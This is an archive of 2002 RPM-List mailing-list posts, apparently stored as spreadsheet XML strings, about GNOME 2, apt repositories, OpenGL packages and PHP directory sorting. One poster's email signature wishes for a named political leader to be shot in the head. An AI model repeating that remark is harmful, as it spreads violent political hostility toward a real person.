&gt;I'm uising Havoc Pennington's Gnomehide and it rocks. I installed it before I
knew about apt, but one of the previous emails had an apt repository that
claimed to have gnomehide. Just remember there is one kew file that makes the
difference between Gnome1 and Gnome2 being used. I *think* it is "gnome-core"
vs. "gnome-session" but I can not remember.Note that that those same files are probably in the Limbo beta, except
updated. There has not been a major change to "gnomehide" in a while, I
suspect Havoc's work went into Limbo then.--
That's "angle" as in geometry._______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">I build a lot of rpms but I'm to stupid/busy to "apt-ize" what I have. I wish
it was apt enabled because I have several boxen and apt would help even with
rpms that I build. Did I mention forgetful too?http://www.dudex.net/rpms
che (che666@uni.de) wrote*:
&gt;
&gt;hello!
&gt;well in my eyes something like a public contrib repository would be nice
(where everyone can at least upload spec files) and a something like a
"repository directory" with a collection of available repositorys and their
content.
&gt;
&gt;i am personally on a dsl dialup connection with 16kb/s upstream cap and that
kinda sucks perhaps i am gonna still create a respository for small
windowmaker dockapps in the future :).
&gt;
&gt;what do you think?
&gt;
&gt;thanks,
&gt;che
&gt;
&gt;_______________________________________________
&gt;RPM-List mailing list 
&gt;--
That's "angle" as in geometry._______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 2002-07-24 at 03:50, Angles Puglisi wrote:
&gt; Lance (lance_tt@bellsouth.net) wrote*:
&gt; &gt;
&gt; &gt;well, from the looks of things, Evolution mail client isn't supported
&gt; &gt;just yet, so I reckon I'll wait a bit.  Whoever posted these gnome2 apt
&gt; &gt;repositories, thanks!!!
&gt; &gt;
&gt; 
&gt; I'm uising Havoc Pennington's Gnomehide and it rocks. I installed it before I
&gt; knew about apt, but one of the previous emails had an apt repository that
&gt; claimed to have gnomehide. Just remember there is one kew file that makes the
&gt; difference between Gnome1 and Gnome2 being used. I *think* it is "gnome-core"
&gt; vs. "gnome-session" but I can not remember.
&gt; 
&gt; Note that that those same files are probably in the Limbo beta, except
&gt; updated. There has not been a major change to "gnomehide" in a while, I
&gt; suspect Havoc's work went into Limbo then.Right, gnomehide is only updated when it's been a while since the last
red hat release, and the next beta isn't out yet. Since the beta is out
now, gnomehide won't be updated again for a while.Julian
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Well, from the looks of things, I can import all my mail settings from
Evolution to Sylpheed.  Has anyone successfully run Sylpheed in Gnome
2.0?  I noticed with 'apt-get install gnome-session' from the 'rpm
http://apt.sunnmore.net gnome2 73' repository, Sylpheed isn't one of the
packages selected for deletion.LanceOn Wed, 2002-07-24 at 14:05, Julian Missig wrote:
&gt; On Wed, 2002-07-24 at 03:50, Angles Puglisi wrote:
&gt; &gt; Lance (lance_tt@bellsouth.net) wrote*:
&gt; &gt; &gt;
&gt; &gt; &gt;well, from the looks of things, Evolution mail client isn't supported
&gt; &gt; &gt;just yet, so I reckon I'll wait a bit.  Whoever posted these gnome2 apt
&gt; &gt; &gt;repositories, thanks!!!
&gt; &gt; &gt;
&gt; &gt; 
&gt; &gt; I'm uising Havoc Pennington's Gnomehide and it rocks. I installed it before I
&gt; &gt; knew about apt, but one of the previous emails had an apt repository that
&gt; &gt; claimed to have gnomehide. Just remember there is one kew file that makes the
&gt; &gt; difference between Gnome1 and Gnome2 being used. I *think* it is "gnome-core"
&gt; &gt; vs. "gnome-session" but I can not remember.
&gt; &gt; 
&gt; &gt; Note that that those same files are probably in the Limbo beta, except
&gt; &gt; updated. There has not been a major change to "gnomehide" in a while, I
&gt; &gt; suspect Havoc's work went into Limbo then.
&gt; 
&gt; Right, gnomehide is only updated when it's been a while since the last
&gt; red hat release, and the next beta isn't out yet. Since the beta is out
&gt; now, gnomehide won't be updated again for a while.
&gt; 
&gt; Julian
&gt; 
&gt; 
&gt; _______________________________________________
&gt; RPM-List mailing list 
&gt; http://lists.freshrpms.net/mailman/listinfo/rpm-list
-- 
:
####[ Linux One Stanza Tip (LOST) ]###########################Sub : Monitoring su attempts                         LOST #115In a multiuser system you may like to monitor all su attempts.
Edit /etc/login.defs and edit SULOG_FILE as follows:
SULOG_FILE    /var/log/sulog   ... (name of file to hold info)########################################
:
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Lance wrote :&gt; Well, from the looks of things, I can import all my mail settings from
&gt; Evolution to Sylpheed.  Has anyone successfully run Sylpheed in Gnome
&gt; 2.0?  I noticed with 'apt-get install gnome-session' from the 'rpm
&gt; http://apt.sunnmore.net gnome2 73' repository, Sylpheed isn't one of the
&gt; packages selected for deletion.I think that's simply because Sylpheed isn't a GNOME application, but a
"simple" gtk+ one. It needs no GNOME libs at all, so upgrading to GNOME 2
but keeping gtk+ 1.2 will let you keep Sylpheed with no problem.MatthiasPS : Expect 0.8.1 on freshrpms.net in a few minutes ;-)--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</si>
  <si>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Thu, 25 Jul 2002 11:07:00 +0200, Matthias Saou  wrote:&gt; Once upon a time, Lance wrote :
&gt; 
&gt; &gt; Well, from the looks of things, I can import all my mail settings from
&gt; &gt; Evolution to Sylpheed.  Has anyone successfully run Sylpheed in Gnome
&gt; &gt; 2.0?  I noticed with 'apt-get install gnome-session' from the 'rpm
&gt; &gt; http://apt.sunnmore.net gnome2 73' repository, Sylpheed isn't one of the
&gt; &gt; packages selected for deletion.
&gt; 
&gt; I think that's simply because Sylpheed isn't a GNOME application, but a
&gt; "simple" gtk+ one. It needs no GNOME libs at all, so upgrading to GNOME 2
&gt; but keeping gtk+ 1.2 will let you keep Sylpheed with no problem.    Yeah, mine works here; I did about the same thing.    Hey: "Universe"   I saw this keyword on the gstreamer website.  They said something like "If you're feeling froggy and want to jump into it, use apt-get gstreamer-universe" but I've not gotten the syntax of it right, to get "all" of a project yet.  Has anyone used this yet?------------------------------------------------------------------------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</si>
  <si>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Once upon a time, Brian wrote :&gt; 
&gt;     More information on that slick "gstreamer-universe" thing.
&gt; 
&gt;     Go to this page: http://gstreamer.net/releases/redhat
&gt; 
&gt;     They seem to have declared a a package called "gstreamer-universe" as
&gt;     a collection of files.  This is brilliant; what we need to do is get
&gt;     someone with a Gnome2-universe and we'll be set, aye?  :)
&gt; 
&gt;     Isn't that a cool idea?This is called "pseudo-packages" or "meta-packages" and Debian has been
using them for ages. I think Mandrake also makes these kind of empty
packages.Anyway, their use has been discussed here a while back, and personally
although I do agree that they can be useful at times, I don't really like
them. For me it's more of an ugly "hack" than anything else, and I'd
approve completely a system that would enable to install/remove entire
categories of software... but not if achieved by building empty packages.Also, you can trivially do "apt-get install ", but removing
all that it installed is a bit less trivial, and could be implemented in a
trivial and clean fashion if using some functionality meant to do this.Matthias--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</si>
  <si>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Wed, Jul 24, 2002 at 12:18:27AM +0200, Roy-Magne Mo wrote:
&gt; Seems like irssi.org also has an apt-rpm repository for snapshots of
&gt; irssi:
&gt; 
&gt; rpm http://ninja.no/apt 7.3/i386 irssi
&gt; rpm-src http://ninja.no/apt 7.3/i386 irssiMaybe sf.net should provide automated (how much more automated can it
get? Well, maybe automatic one-click setup and instructions for those
who can't read manuals and a place in which to drop gpg keys) apt-rpm
(and maybe apt-deb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no-one can manage to put in a package with the
same name as another one or otherwise sabotage the thing.(hmm, and I suppose the good sigmonster may deserve a cookie, too..)-- 
Last time I was stoned, I tried to eat an airport.
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 25 Jul 2002 15:25:05 +0200, Matthias Saou  wrote:&gt;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</si>
  <si>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Another thing I see in debian but not in my RH boxen.http://falconseye.sourceforge.net/It's a GL(?) interface to nethack :)-- 
"And don't even think of quoting me out of context ;)"
	-- Michael Hinz in the Monastery
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">FYI,I modified the Mandrake package a few months ago -
rather a nightmare to package, I must say. Some
stability issues but that might be my flaky ATI
drivers.My Linux box is sitting in storage this summer though,
so I don't have the .spec with me.Anyone else tried running Falcon's Eye on Red Hat?Regards,Michel --- Harri Haataja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&gt; http://lists.freshrpms.net/mailman/listinfo/rpm-list __________________________________________________
Do You Yahoo!?
Everything you'll ever need on one web page
from News and Sport to Email and Music Charts
http://uk.my.yahoo.com_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 26 Jul 2002 13:40:57 +0100 (BST), MichÃ¨l Alexandre Salim  wrote:&gt;  --- Angles Puglisi  wrote:
&gt; &gt; 
&gt; &gt; I still think there's got to be a way to get the
&gt; &gt; packages that make gnomehide
&gt; &gt; from the Limbo CDs, they would be newer.
&gt; &gt; 
&gt; Surely you just need to recompile and install them in
&gt; order?    Nope- this one's all about gnome-vfs2 and the developers understand each other's parts- it's a programming issues.  Some versions work together, some don't.  Just like rep-gtk and audiofile was for sawfish, in the previous version of Ximian-gnome.  :(
.
&gt; Ximian packages are awful - I had recurring problems
&gt; with their packaged libxslt a few months back.    Yeah...That's why I was hoping someone else had a 'more gospel' set of files.  Oh, well.  I've found a URL on my system I can get to'em with Nautilus.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</si>
  <si>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Well, I tried the Ximian GNOME 2.0 packages from
http://apt.sunnmore.net, and have to say, it was a let-down.  Ran
'apt-get update' , 'apt-get install gnome-session' then 'apt-get
upgrade' and Nautilus failed to execute, couldn't get any help docs to
come up, along with more problems.  So, with the luck of 'rpm -qa|grep
ximian' then removing by hand all ximian packages with 'rpm -e --nodeps'
and reinstalling everything GNOME and GNOME-related with apt, I got
trusty old Red Hat 7.3 GNOME back on the desktop, and the only trace of
Ximian is Evolution, again, thanks to apt from this site.I really liked Ximian (back then, Helix ?) at first but, to me, Red
Hat's GNOME, released with 7.3 seems much more pretty and up-to-date. 
Could this be because of inclusion of gtk2 in RH 7.3?Lance  On Fri, 2002-07-26 at 07:40, MichÃ¨l Alexandre Salim wrote:
&gt;  --- Angles Puglisi  wrote:
&gt; &gt; 
&gt; &gt; I still think there's got to be a way to get the
&gt; &gt; packages that make gnomehide
&gt; &gt; from the Limbo CDs, they would be newer.
&gt; &gt; 
&gt; Surely you just need to recompile and install them in
&gt; order?
&gt; 
&gt; Ximian packages are awful - I had recurring problems
&gt; with their packaged libxslt a few months back.
&gt; 
&gt; Regards,
&gt; 
&gt; Michel
&gt; 
&gt; __________________________________________________
&gt; Do You Yahoo!?
&gt; Everything you'll ever need on one web page
&gt; from News and Sport to Email and Music Charts
&gt; http://uk.my.yahoo.com
&gt; 
&gt; _______________________________________________
&gt; RPM-List mailing list 
&gt; http://lists.freshrpms.net/mailman/listinfo/rpm-list
-- 
:       _ /~\'_
         (o o)
=====oooO==U==Oooo================[Joe Ramaswamy]==========THE LEWINSKY virus..
(Sucks all the memory out of your computer, 
then Emails everyone about what it did)============================[URL:http://devil.net/joe_r/]==
:
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Lance (lance_tt@bellsouth.net) wrote*:
&gt;
&gt;I really liked Ximian (back then, Helix ?) at first but, to me, Red
&gt;Hat's GNOME, released with 7.3 seems much more pretty and up-to-date.
&gt;Could this be because of inclusion of gtk2 in RH 7.3?Not many apps actually use gtk2 yet. If they do, it's obvious because it is a
different tool kit. With gnomehide, I ported a lot of gtk1.2 themes to gtk2,
because they are rarely compatible. Those themes are on dudex.net/rpms/ but it
does not matter unless you have gnome2.In gnomehide, the apps that actually use gtk2 are Nautilus, gedit, some of the
"utility" apps, like dictionary, calcultor, the settings applets, and of
course the gnome panels and menus.--
That's "angle" as in geometry._______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 2002-07-26 at 12:52, Harri Haataja wrote:&gt; Another thing I see in debian but not in my RH boxen.
&gt; 
&gt; http://falconseye.sourceforge.net/
&gt; 
&gt; It's a GL(?) interface to nethack :)Take a look at , I have RPMs for RH7.3 there,
based on (and compatible with) the NH3.x that last appeared in RH7.1
powertools.  apt'able, of course :)-- 
\/ille SkyttÃ¤
ville.skytta at iki.fi
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi."Kevin Worthington"  wrote:&gt; into /home/dude/redhat etc. by running
&gt; #rpm -ivh foo.src.rpmDo this:
echo "%_topdir /home/dude/redhat" &gt;&gt; /home/dude/.rpmmacrosand make sure the directory structure (RPMS, SOURCES, SPECS, SRPMS, BUILD)
is there.-- 
R!_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Jul 30, 2002 at 12:17:21AM +0300, Ville SkyttÃ¤ wrote:
&gt; On Fri, 2002-07-26 at 12:52, Harri Haataja wrote:
&gt; &gt; Another thing I see in debian but not in my RH boxen.
&gt; &gt; http://falconseye.sourceforge.net/
&gt; &gt; It's a GL(?) interface to nethack :)
&gt; Take a look at , I have RPMs for RH7.3
&gt; there, based on (and compatible with) the NH3.x that last appeared in
&gt; RH7.1 powertools.  apt'able, of course :)And Text-Iconv too, nice :)Gpg key is nowhere in sight though even while vendors.list lists key
id's.-- 
&lt;@zomby[tm]&gt; tea is just like noodle soup without noodles
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Hehe :-) So your usual *n?x login is "dude" too? ;-)))))))
&gt; 
&gt; MatthiasHey Matthias,
Actually it isn't, I used yours (I remembered from the RPM builder's guide "The fight" that your wrote). Mine is boring, I use kworthington, since my boxes are on a corporate LAN.
Sorry to get your hopes up! You can think of it as a tribute to you if it makes you feel any better :-)------------------------------------------------
Kevin Worthington - 
Faithful Red Hat Linux user since April 1998
Registered Linux User #218689 - http://counter.li.org
-- 
Get your free email from www.linuxmail.org 
Powered by Outblaze_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Harri
Thanks for the help!&gt; &gt; (why do I have the feeling that Matthias will answer this one...? ;-)
&gt; 
&gt; I'm sorry if I disappointed you :)Hehe, no not at all! ;)------------------------------------------------
Kevin Worthington - 
Faithful Red Hat Linux user since April 1998
Registered Linux User #218689 - http://counter.li.org
-- 
Get your free email from www.linuxmail.org 
Powered by Outblaze_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 2002-07-30 at 19:53, Harri Haataja wrote:&gt; &gt; &gt; Another thing I see in debian but not in my RH boxen.
&gt; &gt; &gt; http://falconseye.sourceforge.net/
&gt; &gt; &gt; It's a GL(?) interface to nethack :)&gt; &gt; Take a look at , I have RPMs for RH7.3
&gt; &gt; there, based on (and compatible with) the NH3.x that last appeared in
&gt; &gt; RH7.1 powertools.  apt'able, of course :)
&gt; 
&gt; And Text-Iconv too, nice :)
&gt; 
&gt; Gpg key is nowhere in sight though even while vendors.list lists key
&gt; id's.Oops, fixed (in /apt/vs.key.asc).  Thanks for pointing that out.-- 
\/ille SkyttÃ¤
ville.skytta at iki.fi
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Manfred wrote :&gt; I would like to install RPM itself. I have tried to get the information
&gt; by visiting www.rpm.org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GroboschWell, you can simply use an rpm tarball (or extract one from a source rpm
on a machine that has rpm scripts install "rpm2cpio  | cpio
-dimv" and "./configure &amp;&amp; make &amp;&amp; make install" as usual. You need db3 or
db4 development files at least, and once everything installed you'll need
to initialize your rpm database.If you need more help, I suggest you join the rpm-list@redhat.com by
subscribing at https://listman.redhat.com/Matthias--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</si>
  <si>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Tue, 30 Jul 2002 22:22:24 +0200, "Manfred Grobosch"  wrote:&gt; I would like to install RPM itself. I have tried to get the information by
&gt; visiting www.rpm.org   and the related links they give
&gt; but they all seems to assume that RPM already is installed.
&gt; I have a firewall based on linux-2.2.20 (Smoothwall) for private use.
&gt; I would like to install the RPM package/program but there is no information
&gt; how to do this from scratch.
&gt; Found this site and hopefully some have the knowledge.    Well, if you have a Windows, SCO, or AIX box, (generally anything BUT Redhat Linux) that'd be the site I'd send you to, to get it installed.  I've been there for the same reason, under SCO.  Maybe you missed something?    What OS are you running, anyway?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</si>
  <si>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First, thanks for all the rpms, and especially ogle (which comes very close to 
working perfectly on my Cyrix 333 box!).Now, I desperately need some games, especially TuxKart and FlightGear, but I 
forever get stuck on a dependency: everything needs OpenGL. Querying the rpm 
database for OpenGL gets me nowhere fast. Can anyone point me in the right 
direction? What, in RedHat, provides OpenGL?Sorry for the question, but I've just switched from SuSE and I'm used to being 
able to tell YaST to sort out the dependencies........CheersJohn_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi.John Hinsley  wrote:&gt; Querying the rpm database for OpenGL gets me nowhere fast. Can anyone
&gt; point me in the right direction? What, in RedHat, provides OpenGL?The X server itself does (or does not, depending on your driver). There
is a software fallback called Mesa compiled in the X server, which
is used as a fallback. So, if you have installed X, you have OpenGL.
Try the glxinfo command to see the capabilities provided by your
X system.-- 
R!_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 2002-07-31 at 06:34, John Hinsley wrote:
&gt; First, thanks for all the rpms, and especially ogle (which comes very close to 
&gt; working perfectly on my Cyrix 333 box!).
&gt; 
&gt; Now, I desperately need some games, especially TuxKart and FlightGear, but I 
&gt; forever get stuck on a dependency: everything needs OpenGL. Querying the rpm 
&gt; database for OpenGL gets me nowhere fast. Can anyone point me in the right 
&gt; direction? What, in RedHat, provides OpenGL?
&gt; If you have an NVIDIA card, the NVIDIA_GLX rpm provides OpenGL. It's for
the NVidia proprietory drivers.Daniel
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wednesday 31 Jul 2002 9:53 am, Ralf Ertzinger wrote:
&gt; Hi.
&gt;
&gt; John Hinsley  wrote:
&gt; &gt; Querying the rpm database for OpenGL gets me nowhere fast. Can anyone
&gt; &gt; point me in the right direction? What, in RedHat, provides OpenGL?
&gt;
&gt; The X server itself does (or does not, depending on your driver). There
&gt; is a software fallback called Mesa compiled in the X server, which
&gt; is used as a fallback. So, if you have installed X, you have OpenGL.
&gt; Try the glxinfo command to see the capabilities provided by your
&gt; X system.I get:[john@localhost john]$ glxinfo
name of display: :0.0
display: :0  screen: 0
direct rendering: Yes
server glx vendor string: NVIDIA Corporation
server glx version string: 1.2
server glx extensions:
    GLX_EXT_visual_info, GLX_EXT_visual_rating, GLX_SGIX_fbconfig,
    GLX_SGIX_pbuffer
client glx vendor string: NVIDIA Corporation
client glx version string: 1.2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TNT2/AGP
OpenGL version string: 1.3.1 NVIDIA 29.60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1.3
glu extensions:
    GLU_EXT_nurbs_tessellator, GLU_EXT_object_space_tess   visual  x  bf lv rg d st colorbuffer ax dp st accumbuffer  ms  cav
 id dep cl sp sz l  ci b ro  r  g  b  a bf th cl  r  g  b  a ns b eat
----------------------------------------------------------------------
0x21 16 tc  0 16  0 r  y  .  5  6  5  0  0 16  0 16 16 16 16  0 0 None
0x22 16 dc  0 16  0 r  y  .  5  6  5  0  0 16  0 16 16 16 16  0 0 None
0x23 16 tc  0 16  0 r  .  .  5  6  5  0  0 16  0 16 16 16 16  0 0 None
0x24 16 dc  0 16  0 r  .  .  5  6  5  0  0 16  0 16 16 16 16  0 0 NoneSo, I *do* have OpenGL, thanks all.Problem is that I can't find an rpm of plib which will install (or recognise 
that I have open GL). I guess I'll have to try and do that from source, 
unless anyone has any ideas?CheersJohnJohnBut I can't seem to find a version 
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Maybe I'm just blind, but I've been poking through the
archives of this list trying to find 1) what
up-to-date KDE3 repositories are available and 2)
where all the Xine skins went.Anybody?__________________________________________________
Do You Yahoo!?
Yahoo! Health - Feel better, live better
http://health.yahoo.com_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Doug wrote :&gt; Maybe I'm just blind, but I've been poking through the
&gt; archives of this list trying to find 1) what
&gt; up-to-date KDE3 repositories are available and 2)
&gt; where all the Xine skins went.For that nÂ°2, it's simple : They've been pulled out from the upstream xine
source. I guess I should make a "xine-skins" package if there is enough
demand for it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</si>
  <si>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Once upon a time, Matthias wrote :&gt; For that nÂ°2, it's simple : They've been pulled out from the upstream
&gt; xine source. I guess I should make a "xine-skins" package if there is
&gt; enough demand for it ;-)Well, replying to my own post, sorry ;-)
There is now a 1.3MB xine-skins package that includes all the available
skins that can be found on the xine website.Time to "apt-get install xine-skins" for those who started to miss xinetic
or lcd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</si>
  <si>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Thu, 2002-08-01 at 11:51, Matthias Saou wrote:&gt;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top.Take a look at
, that's what produces the list at .  Dirs are sorted alphabetically there, but I guess sorting by date wouldn't be that hairy...-- 
\/ille SkyttÃ¤
ville.skytta at iki.fi
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 2002-08-01 at 10:51,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&gt; 
&gt; Now, if there are php programmers on this list, I'd love to have their help
&gt; on how to do this ;-) It must be quite simple to get the system mtime for
&gt; the directory, it's the ordering that scares me a bit more.
&gt; 
&gt; Attached is the current code (please keep in mind that I'm not a
&gt; programmer, it usually explains a lot ;-)).
&gt; You could try opening the directory with $filelist = popen("ls -t
", "r"). This should give you the filenames in the
directory sorted by mod.time. You can then open each filename, and read
filemtime() to get the mod.time.Daniel
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 1 Aug 2002 10:51:56 +0200, Matthias Saou  wrote:&gt; Sorry, this hasn't got much to do with rpm packages directly ;-)
&gt; 
&gt; My "builds" page is getting bigger and bigger, and quite messy as
&gt; directories are listed in no particular order :
&gt; http://freshrpms.net/builds...    Yep.  Make sure there's a field in the database called (for example) "Updated" and when it comes time to generate the list, add "order by updated".  This'll put it in that particular order for ya.  You can also chose to order it by name, etc by changing this field.    This should be the same for both MySql and Postgressql (any modern SQL, really).  Which are you using?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</si>
  <si>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Once upon a time, Brian wrote :&gt; On Thu, 1 Aug 2002 10:51:56 +0200, Matthias Saou 
&gt; wrote:
&gt; 
&gt; &gt; Sorry, this hasn't got much to do with rpm packages directly ;-)
&gt; &gt; 
&gt; &gt; My "builds" page is getting bigger and bigger, and quite messy as
&gt; &gt; directories are listed in no particular order :
&gt; &gt; http://freshrpms.net/builds...
&gt; 
&gt;     Yep.  Make sure there's a field in the database called (for example)
&gt;     "Updated" and when it comes time to generate the list, add "order by
&gt;     updated".  This'll put it in that particular order for ya.  You can
&gt;     also chose to order it by name, etc by changing this field.
&gt; 
&gt;     This should be the same for both MySql and Postgressql (any modern
&gt;     SQL, really).  Which are you using?None for that "builds" part : It's just an export of the CVS tree in which
I keep my spec files and patches! ;-)
I think the filemtime() php function that Ville uses in his sript is what
I'm looking for, then I guess I just need to fill an array with the names
and mtimes, sort it, then display what I want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</si>
  <si>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 Thu, 1 Aug 2002 12:53:00 +0200, Matthias Saou  wrote:&gt; None for that "builds" part : It's just an export of the CVS tree in which
&gt; I keep my spec files and patches! ;-)
&gt; I think the filemtime() php function that Ville uses in his sript is what
&gt; I'm looking for, then I guess I just need to fill an array with the names
&gt; and mtimes, sort it, then display what I want :-)    Arg; what a pain.  You can have a cron job to 'digest' this information every so often and populate the database...
------------------------------------------------------------------------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</si>
  <si>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On Thursday 01 Aug 2002 1:29 pm, Ralf Ertzinger wrote:
&gt; Hi.
&gt;
&gt; John Hinsley  wrote:
&gt; &gt; So, I *do* have OpenGL, thanks all.
&gt;
&gt; And it is using your hardware.
&gt;
&gt; &gt; Problem is that I can't find an rpm of plib which will install (or
&gt; &gt; recognise that I have open GL). I guess I'll have to try and do that
&gt; &gt; from source, unless anyone has any ideas?
&gt;
&gt; plib as in plib.sf.net? They do not provide RPMs, as far as I have seen
&gt; (and I did not look inside the tarballs). Maybe it will be best to
&gt; build your RPMS yourself (and maybe Matthias can share some insight
&gt; in building RPMS with NVIDIAs drivers installed, it seems to be a
&gt; little tricky to do that and get RPMS which install on systems
&gt; without these drivers).Please! It does seem that with 7.3 something rather extraordinary has 
happened! And while there are rpms for plib (as in plib.sf.net), TuxRacer, 
FlightGear and so on (for SuSE, Mandy and Connectiva, IIRC) dotted around, 
there are none for 7.3. CheersJohn
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">I am a php programmer (very busy one at that - anglemail.org) but if someone
gets to this before me, I would also love to se the code because I want my
rpms site to be more user friendly.Matthias Saou (matthias@egwn.net) wrote*:
&gt;
&gt;Sorry, this hasn't got much to do with rpm packages directly ;-)
&gt;
&gt;My "builds" page is getting bigger and bigger, and quite messy as
&gt;directories are listed in no particular order :
&gt;http://freshrpms.net/builds/
&gt;
&gt;What I'd need is to have last modification date of the directory displayed
&gt;next to the directory name (sort of like "mplayer - Thu Aug 1 2002"), and
&gt;the list ordered to have the most recent entries at the top.
&gt;
&gt;Now, if there are php programmers on this list, I'd love to have their help
&gt;on how to do this ;-) It must be quite simple to get the system mtime for
&gt;the directory, it's the ordering that scares me a bit more.
&gt;
&gt;Attached is the current code (please keep in mind that I'm not a
&gt;programmer, it usually explains a lot ;-)).
&gt;
&gt;Matthias
&gt;
&gt;--
That's "angle" as in geometry._______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 1 Aug 2002 17:10:48 +0100, John Hinsley  wrote:&gt; No, the problem is that what plip expects is GL/glut.h (amongst other things) 
&gt; which were there in 7.2 but have vanished in 7.3.     Yeah, I know what you mean.  Here's the trick:    Remove the Nvidia drivers. Yeah, I know it's a pain...
    Load BOTH mesa, mesa-demos and basically everything that comes in the mesa rpm.   
    THEN load NVidia; it'll know what to do.    ...but it seems like I had to do this on 7.2, too.------------------------------------------------------------------------
Brian FahrlÃ¤nder              Linux Zealot, Conservative, and Technomad
Evansville, IN                    My Voyage: http://www.CounterMoon.com
ICQ  5119262
------------------------------------------------------------------------
I don't want to hear news from Isreal until the news contains the words
"Bullet", "Brain", and "Arafat"._______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Hiya folks,I'm currently running RawHide, since I had the brilliant idea that, by
using APT, it might actually be practical to keep up with the
developments.However, APT seems to want a recompile - its sometimes leaving the RPM
database in need of a db_recover - and gcc 3.2 seems to require a closer
adherence to the standard than the C++ in APT was written for.This is a bit of a bummer.Does anyone know if there's a latest version I could try which might
work, or whether I should simply do the porting myself? (I've made a
start, but there's a fair amount of work to do.)If this works out, I might start a repository for the freshrpms compiled
on vLatest RawHide, for my own purposes and anyone else who's
interested.Dave._______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 9 Aug 2002 10:34:23 +0200, Matthias Saou  wrote:&gt; Well, I stand corrected :-)
&gt; The thing is, I hadn't used gconf-editor yet... and it's exactly what I
&gt; feared, old "not so good" memories are coming back : It looks exactly like
&gt; a GNOME RegEdit :-/ Oh well.
&gt; I still hope that the few missing features I'm still looking for will be
&gt; added in the next 2.0.x releases, like for example being able to have the
&gt; panel always under *all* other windows (if you know how to do that, I'm
&gt; really interested! ;-)).
&gt; 
    Ya know, I was thinking the same thing.  But there's at least two main 'opposing thumbs' between regedit and gconf:    1. GConf is written in English, not symbol tables; you can actually READ what the heck you're looking at.    2. Because it's better-considered, it should be more sound; when the registry gets a wrong value, you may not be able to boot....if GConf is scrogged, you can still have all the underlying power of the OS to keep things running....just call up WindowMaker (or whatever) for the next session until you get it worked out.    It took me a while to warm up to it...but I *do* like Gconf...------------------------------------------------------------------------
Brian FahrlÃ¤nder              Linux Zealot, Conservative, and Technomad
Evansville, IN                    My Voyage: http://www.CounterMoon.com
ICQ  5119262
------------------------------------------------------------------------
"Waddling" into the mainstream?  I suppose...
http://www.usatoday.com/usatonline/20020805/4333165s.htm_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Julian wrote :&gt; One of the things you need to understand with gnome2 is that while they
&gt; did simplify a lot of things, most of the configuration options people
&gt; found very useful are still available through gconf. Learn to love
&gt; gconf-editor ;) -- metacity can have sloppy focus (Desktop Preferences
&gt; -&gt; Window Focus -- there's actually GUI for that), and the delay until
&gt; raising (and whether it raises) can be set in gconf-editor,
&gt; /apps/metacity/general/auto_raise and auto_raise_delayWell, I stand corrected :-)
